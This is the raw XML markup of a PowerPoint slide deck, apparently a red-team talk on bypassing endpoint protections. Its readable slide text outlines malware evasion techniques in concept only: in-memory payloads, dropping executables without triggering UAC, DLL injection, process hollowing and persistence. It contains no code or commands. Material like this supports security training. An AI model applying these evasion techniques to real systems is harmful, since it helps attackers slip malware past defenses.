                      <a:cxn ang="0">
                        <a:pos x="1184" y="438"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1208" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1208" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1166" y="27"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1124" y="49"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1079" y="68"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1031" y="85"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="981" y="97"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="931" y="107"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="878" y="114"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="826" y="114"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="826" y="114"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="773" y="114"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="720" y="107"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="670" y="97"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="620" y="85"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="572" y="68"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="527" y="49"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="483" y="27"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="440" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="107"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="16" y="543"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="16" y="543"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="58" y="570"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="103" y="597"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="148" y="621"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="195" y="645"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="243" y="665"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="290" y="684"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="340" y="704"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="390" y="721"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="443" y="733"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="496" y="748"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="549" y="757"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="601" y="767"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="657" y="774"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="712" y="779"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="768" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="826" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="826" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="881" y="782"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="936" y="779"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="992" y="774"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1047" y="767"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1103" y="757"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1155" y="748"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1208" y="733"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1258" y="721"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1308" y="704"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1358" y="684"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1408" y="665"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1456" y="645"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1501" y="621"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1548" y="597"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1590" y="570"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1635" y="543"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="1184" y="438"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="1635" h="782">
                        <a:moveTo>
                          <a:pt x="1184" y="438"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1166" y="27"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1124" y="49"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1079" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1031" y="85"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="981" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="931" y="107"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="878" y="114"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="826" y="114"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="826" y="114"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="773" y="114"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="720" y="107"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="670" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="620" y="85"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="527" y="49"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="483" y="27"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="440" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="107"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="543"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="543"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="58" y="570"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="103" y="597"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="148" y="621"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="195" y="645"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="243" y="665"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="290" y="684"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="340" y="704"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="390" y="721"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="443" y="733"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="496" y="748"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="549" y="757"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="601" y="767"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="657" y="774"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="712" y="779"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="768" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="826" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="826" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="881" y="782"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="936" y="779"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="774"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1047" y="767"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1103" y="757"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1155" y="748"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1208" y="733"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1258" y="721"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1308" y="704"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1358" y="684"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1408" y="665"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1456" y="645"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1501" y="621"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1548" y="597"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1590" y="570"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1635" y="543"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1184" y="438"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="6D64CC"/>
                  </a:solidFill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GB" sz="1000">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                      <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20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561312" y="3001417"/>
                <a:ext cx="1427626" cy="142762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 anchorCtr="1"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Running a malware</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Line 13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2748218" y="2527861"/>
              <a:ext cx="1227" cy="1184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8" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2748218" y="2527861"/>
              <a:ext cx="1227" cy="1184"/>
            </a:xfrm>
            <a:prstGeom prst="line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00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gray">
            <a:xfrm>
              <a:off x="3000015" y="4195434"/>
              <a:ext cx="462933" cy="156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t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:tabLst>
                  <a:tab pos="6464300" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1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0" name="Rectangle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1676845" y="2520051"/>
              <a:ext cx="679729" cy="156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t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:tabLst>
                  <a:tab pos="6464300" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1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DLL Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 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gray">
            <a:xfrm>
              <a:off x="2840211" y="2913999"/>
              <a:ext cx="604748" cy="1564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t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:tabLst>
                  <a:tab pos="6464300" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1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Persistence</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 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gray">
            <a:xfrm>
              <a:off x="1584205" y="4673500"/>
              <a:ext cx="625938" cy="3129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t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:tabLst>
                  <a:tab pos="6464300" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1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Executables</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:tabLst>
                  <a:tab pos="6464300" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1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13" name="Rectangle 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gray">
            <a:xfrm>
              <a:off x="826219" y="3775439"/>
              <a:ext cx="549326" cy="3260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t" anchorCtr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ts val="100"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Process </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="100"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Hollowing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2813791" y="2571332"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="86086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1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3264095" y="3818821"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="86086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2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2332937" y="4728976"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="86086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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Oval 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="993665" y="3397818"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="86086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4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1257971" y="2601270"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="86086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5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277007" y="3591877"/>
              <a:ext cx="274320" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="860864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 anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1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6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8484812" y="3378302"/>
            <a:ext cx="3118279" cy="8994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1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instead of dropping files on the system, once the executable in the run-time, it will place the payload in the memory and run the application in the memory, sometimes it runs in the encrypted payload with asymmetric encryption, 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8340098" y="3064486"/>
            <a:ext cx="3428732" cy="234518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80B8D6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720" tIns="27432" rIns="45720" bIns="27432" anchor="ctr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sz="1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Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8419241" y="5389235"/>
            <a:ext cx="3417598" cy="4378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1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dropping files on the system in world-writable places without triggering the UAC in windows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215620" y="3402104"/>
            <a:ext cx="2415577" cy="76944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1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When a process starts, it will locate and load library files that have the functionality needed by the process. With DLL injection, the attacker creates a malicious library with the same name and API as the good one</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401393" y="3064486"/>
            <a:ext cx="3429000" cy="234518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070AD"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720" tIns="27432" rIns="365760" bIns="27432" anchor="ctr">
            <a:no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sz="1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DLL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834827" y="5400495"/>
            <a:ext cx="3126962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ts val="1200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>injecting malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rounded Rectangle 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423171" y="5082170"/>
            <a:ext cx="3649563" cy="234518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4701A7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720" tIns="27432" rIns="457200" bIns="27432" anchor="ctr">
            <a:no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sz="1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Process Hollowing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Oval 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8140402" y="2980679"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Oval 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800751" y="4998363"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8090286" y="5082170"/>
            <a:ext cx="3693727" cy="234518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6D64CC"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720" tIns="27432" rIns="45720" bIns="27432" anchor="ctr">
            <a:no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sz="1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Executables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Oval 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828079" y="4998363"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643843" y="2980679"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill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8076355" y="1998204"/>
            <a:ext cx="3526736" cy="6686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ts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Once executed on target system, a malware try to hide itself and achieving persistence on the exploited machine, in order to continue to act even after system reboot.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163113" y="1718130"/>
            <a:ext cx="3986784" cy="234518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wrap="square" lIns="365760" tIns="27432" rIns="45720" bIns="27432" anchor="ctr"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sz="1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Persistence/ Mutex</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020697" y="1634323"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042104" y="1718130"/>
            <a:ext cx="3985421" cy="234518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="01D1D0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720" tIns="27432" rIns="365760" bIns="27432" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10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Delivery techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Oval 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4812344" y="1634323"/>
            <a:ext cx="402132" cy="402132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860864"/>
          </a:solidFill>
          <a:ln w="19050"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 anchorCtr="1"/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6</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="12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64" name="Oval 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4474817" y="2310443"/>
            <a:ext cx="3243476" cy="324347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02E6373A-59AF-0944-892D-390325A0447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4602" y="6507595"/>
            <a:ext cx="3531626" cy="27940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4FE88CF-F7DA-8549-867E-0C80E70358B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407988" y="914400"/>
            <a:ext cx="265906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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD78A5AA-A5E2-2941-8465-29BA35674BA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71312" y="6121079"/>
            <a:ext cx="1120688" cy="73692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C5B197D-EAB3-B04F-B9CC-A36A8D0F84C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42747" y="38904"/>
            <a:ext cx="1120688" cy="73692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03360735-0A7D-E944-9169-F8E9EECB387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74602" y="6474054"/>
            <a:ext cx="4874191" cy="322818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C81CB130-1435-8B4A-8795-69F3F7AB0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465" y="6037981"/>
            <a:ext cx="1377374" cy="73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00646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TOBUBBLE" val="true"/>
  <p:tag name="THINKCELLSHAPEDONOTDELETE" val="p9LToIBenTU6G4tPnSnupLw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XmnnIr26E2YHJcx7fuB.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y9TA2PZX0.cWMG9OXV__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KcXvf3lKEiWexnqg2Lf7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ZuLETbBeEW2WMye1Ngqo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_7qZKbdY0i.TNll49J8b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wOX2YBUTUeLkl1riSPty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SATioim8UyrOwkgbhFS5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aTWZOYhFkKrk1Fx1Iv9V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rZnRrcLdkmcLf0U.HT._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KgTij8nNUOO41TwbUbCl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K2k9qeK20yXrmQudLHHE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4PrbVdfm0GAGoSGCqJH3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W9NFUe1pkumkYoCbXydc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1292</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>207</Paragraphs>
  <Slides>28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-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>ATT Aleck Sans</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>The Art of bypassing endpoint protections for red teaming engagements</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>About Us</vt:lpstr>
